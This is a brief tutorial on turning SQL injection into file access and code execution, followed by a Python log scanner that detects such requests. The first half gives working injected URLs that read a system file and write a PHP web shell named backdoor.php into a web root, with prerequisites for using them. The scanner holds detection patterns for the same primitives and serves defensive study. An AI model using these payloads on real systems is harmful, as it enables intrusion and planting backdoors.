Code Execution Via Injection

Depending on the extent of the vulnerability, SQL injection can be used to execute commands on the remote system. Whether this is possible depends on the operating system, service privileges and filesystem permissions.

This example reads a file from the filesystem:

http://192.168.1.1/pricelist.php?id=1 union all select 1, 2, load_file('C:/Windows/System32/drivers/etc/hosts')

This example writes a file into the XAMPP directory:

http://192.168.1.1/pricelist.php?id=1 union all select 1, 2, "<?php echo shell_exec($_GET['cmd']);?>" into OUTFILE 'c:/xampp/htdocs/backdoor.php'

A few things you need to know before using the above example:

  • The operating system, in order to be able to write into a specific directory path

  • The webserver and its meta information

  • The installation/www directory of the webserver that is serving the pages

  • Whether the DB user has the privilege to write the file in that directory
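From the defender's side, both requests above leave a recognizable trace in the web server's access log. The following is an added example, not part of the original page: it flags log lines whose decoded request target calls load_file() or uses INTO OUTFILE (it also covers MySQL's INTO DUMPFILE, which the page does not mention). The log lines are constructed and the function names are hypothetical.

```python
import re
from urllib.parse import unquote_plus

# The two MySQL file primitives used in the requests above.
FILE_READ = re.compile(r"\bload_file\s*\(", re.IGNORECASE)
FILE_WRITE = re.compile(r"\binto\s+(?:outfile|dumpfile)\b", re.IGNORECASE)
# Request target from a combined-format access log line.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (192.0.2.0/24 is a documentation range).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /pricelist.php?id=1 HTTP/1.1" 200 512',
    '192.0.2.10 - - [01/Jan/2024:10:00:05 +0000] "GET /pricelist.php?id=1%20union%20all%20select%201,%202,%20load_file(%27C:/Windows/System32/drivers/etc/hosts%27) HTTP/1.1" 200 900',
    '192.0.2.10 - - [01/Jan/2024:10:00:09 +0000] "GET /pricelist.php?id=1+union+all+select+1,+2,+%22x%22+INTO+OUTFILE+%27c:/xampp/htdocs/x.txt%27 HTTP/1.1" 200 0',
    '192.0.2.20 - - [01/Jan/2024:10:01:00 +0000] "GET /export.php?outfile=report.csv HTTP/1.1" 200 128',
]

def normalize(target):
    """URL-decode until stable (max 3 passes), then collapse whitespace."""
    for _ in range(3):
        decoded = unquote_plus(target)
        if decoded == target:
            break
        target = decoded
    return re.sub(r"\s+", " ", target)

def classify(log_line):
    """Return the file primitives seen in one log line's request target."""
    match = REQUEST.search(log_line)
    if not match:
        return []
    query = normalize(match.group(1))
    findings = []
    if FILE_READ.search(query):
        findings.append("file-read")
    if FILE_WRITE.search(query):
        findings.append("file-write")
    return findings

def scan(lines):
    """Map 1-based line number to findings, skipping clean lines."""
    return {n: f for n, line in enumerate(lines, 1) if (f := classify(line))}

if __name__ == "__main__":
    for n, findings in scan(SAMPLE_LOG).items():
        print(n, findings)
```

Access logs record only the request line, so this covers query-string injection like the page's examples and not payloads sent in a POST body.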
